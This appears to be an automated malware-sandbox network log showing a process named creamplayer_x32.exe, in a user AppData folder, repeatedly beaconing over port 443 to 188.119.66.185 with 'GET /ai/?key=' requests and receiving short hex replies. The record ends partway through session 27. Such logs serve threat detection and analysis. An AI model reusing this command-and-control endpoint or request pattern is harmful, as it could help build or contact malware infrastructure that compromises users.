2024-12-14 13:08:38 UTC  542  IN  Data Raw: 32 31 32 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 63 36 38 33 35 65 37 65 66 35 36 65 61 61 66 34 37 63 31 39 39 62 37 63 61 33 64 37 34 64 32 66 34 35 32 63 65 39 66 66 65 35 32 64 35 64 34 38 31 35 34 61 38 62 33 65 61 63 33 30 63 30 61 63 64 64 37 30 35 31 65 64 65 33 38 32 33 31 31 63 64 33 31 38 38 64 35 63 63 39 36 35 66 34 61 64 37 37 33 33 34 66 33 64 65 30 36 35 35 36 66 31 62 37 33 63 61 66 62 30 61 37 30 62 61 65 64 35 62 61 66 66 30 65 61 35 34 61 64 37 65 63 37 63 61 32 31 66 35 66 38 63 65 65 65 35 34 31 32 38 66 35 61 38 34 33 66 61 39 33 35
Data Ascii: 2128b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123c6835e7ef56eaaf47c199b7ca3d74d2f452ce9ffe52d5d48154a8b3eac30c0acdd7051ede382311cd3188d5cc965f4ad77334f3de06556f1b73cafb0a70baed5baff0ea54ad7ec7ca21f5f8ceee54128f5a843fa935

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
3  192.168.2.9  49873  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:39 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:40 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:40 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
4  192.168.2.9  49880  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:42 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:43 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:43 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
5  192.168.2.9  49886  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:44 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:45 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:45 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.9  49892  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:46 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:47 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:47 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
7  192.168.2.9  49898  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:49 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:50 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:50 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
8  192.168.2.9  49904  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:51 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:52 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:52 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49910 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:54 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:08:55 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:08:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:08:55 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49913 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:56 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:08:57 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:08:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:08:57 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49919 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:59 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:00 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:08:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:00 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49925 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:01 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:02 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:02 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49931 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:04 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:04 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:04 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49939 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:06 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:07 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:07 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49946 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:08 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:09 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:09 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49952 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:11 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:11 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:11 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49958 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:13 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:14 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:14 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49966 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:16 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:17 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:17 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49972 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:18 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:19 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:19 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49978 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:20 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:21 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:21 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49984 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:23 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:24 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:24 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49990 | 188.119.66.185 | 443 | 7420 | C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:09:25 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-14 13:09:26 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 14 Dec 2024 13:09:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-14 13:09:26 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID: 23
Source IP: 192.168.2.9
Source Port: 49996
Destination IP: 188.119.66.185
Destination Port: 443
PID: 7420
Process: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
2024-12-14 13:09:27 UTC, 291 bytes, OUT:
GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:09:28 UTC, 200 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:09:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:09:28 UTC, 24 bytes, IN:
Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID: 24
Source IP: 192.168.2.9
Source Port: 49999
Destination IP: 188.119.66.185
Destination Port: 443
PID: 7420
Process: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
2024-12-14 13:09:30 UTC, 291 bytes, OUT:
GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:09:31 UTC, 200 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:09:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:09:31 UTC, 24 bytes, IN:
Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID: 25
Source IP: 192.168.2.9
Source Port: 50000
Destination IP: 188.119.66.185
Destination Port: 443
PID: 7420
Process: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
2024-12-14 13:09:32 UTC, 291 bytes, OUT:
GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:09:33 UTC, 200 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:09:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:09:33 UTC, 24 bytes, IN:
Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID: 26
Source IP: 192.168.2.9
Source Port: 50001
Destination IP: 188.119.66.185
Destination Port: 443
PID: 7420
Process: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
2024-12-14 13:09:35 UTC, 291 bytes, OUT:
GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:09:35 UTC, 200 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:09:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:09:35 UTC, 24 bytes, IN:
Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID: 27
Source IP: 192.168.2.9
Source Port: 50002
